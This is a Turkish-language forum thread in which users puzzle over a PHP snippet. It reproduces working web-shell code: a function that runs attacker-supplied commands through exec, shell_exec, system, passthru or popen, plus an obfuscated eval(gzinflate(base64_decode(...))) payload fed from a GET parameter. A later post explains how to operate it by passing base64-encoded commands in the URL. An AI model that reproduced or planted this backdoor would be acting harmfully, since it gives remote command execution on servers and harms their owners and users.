Bu Komut Nedir Anlayan
-
$cmd=base64_decode($osc);
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}Erdem amca konuya bekleniyorsun
-
$osc'nin de ne olduğunu belirteydin iyiydi
shell olabilir (phpden anlamam ama öyle görünüyor)
linux sunucuda komut çalıştırmayı deniyor gibi
ama komutta ne çalıştıracağı $osc'ye bağlı
-
php tabanlı sistemleri hedef alan bir exploit veya exploitin bir kısmı (nuke).
Andrei tarafından 01/May/14 01:57 tarihinde düzenlenmiştir -
1 2 3 4 5<?php
$osc = $_GET['osc'];
if (isset($osc)) { eval(gzinflate(base64_decode('pZHNasMwEITvhb6DYgyWIZS2lF5CwA9SEI48ilUcyWhlmhDy7l3J+ekhkENPEjM73w5SqXfdetMSPj9UB+07yNKTrlfPTyUI28mmAexlyWdSoXsvbhYrZnI6Wu9EnjKoj5wNILEWVcW+NUIusBvjYbaTb428xBT2liLJCnvoKrtNuubhZQLlMjPw21sniy9XXI0TVxoI94DUYxjUDXtmNDd9LvSAcqCI3bmY3yiKbYgyhZrZukIufB7aIirtXYRjRJ5lEa5TekDr5IOVY0sU+zDdXXox/722saQ46qeg+dNNQox+hJsfvghF/ffVioLDP70dIBeNgTccqWtxFNl/4bAJaDtWl2+v7x/1SpxSWT14SvS8mpWAOAWXQ0n5BQ=='))); }
else {echo 'tiriviri';}
?> -
base64 ile kodlanmış komutları decode ederek ex adını verdiği fonksiyon ile server tabanında komut çalıştırmayı deniyor
ex fonksiyonunda exec,system vb. gibi server tarafında komutları deniyor
muhtemelen base64 ile gönderdiği string içerisinde bir path mevcut ve bu dizindeki dosyaları okumaya yönelik bir saldırı
serverde güvenli mod off ise func çalışır
-
tamam orasını anladımda bu adam bunu nasıl kullanıyor komutları yolluyorum ama ekrana basan bişeyyok
-
EcHoLL bunu yazdı
tamam orasını anladımda bu adam bunu nasıl kullanıyor komutları yolluyorum ama ekrana basan bişeyyok
Gzipi kaldırarak dene gzip olduğu için basmıyordur?
-
Belki yardımı dokunur.

-
EcHoLL bunu yazdı
tamam orasını anladımda bu adam bunu nasıl kullanıyor komutları yolluyorum ama ekrana basan bişeyyok
sen büyük hacker değil miydin yahu ?
nasil kullanamazsın bunu :)
tiriviri
okumaya devam et sen büyüklerin işine de karışma ;) -
acıdım lan sana :D
x.php?osc=command
command yerine yazacağin komutu base64 encode ederek yazacaksın oraya
x.php?osc=ZGly
ZGly = dir
gibi
sağda solda artistlik yaparsan hakkımda kulağını çekerim bilgin olsun :)
-
JustRulz bunu yazdıEcHoLL bunu yazdı
tamam orasını anladımda bu adam bunu nasıl kullanıyor komutları yolluyorum ama ekrana basan bişeyyok
sen büyük hacker değil miydin yahu ?
nasil kullanamazsın bunu :)
tiriviri
okumaya devam et sen büyüklerin işine de karışma ;)Hayırdır hacı yıllardır gizli takipte misin @echoll'u, bir açığını görsem de laf çaksam diye pusuda mı bekliyordun :)
@Yalnız Justrulz çoğu konuda renk vermemiş "ben bilirim" edalarında kendi halinde takılıyor gibi duruyor, echollun aklı başında bir rakibi olabilir.
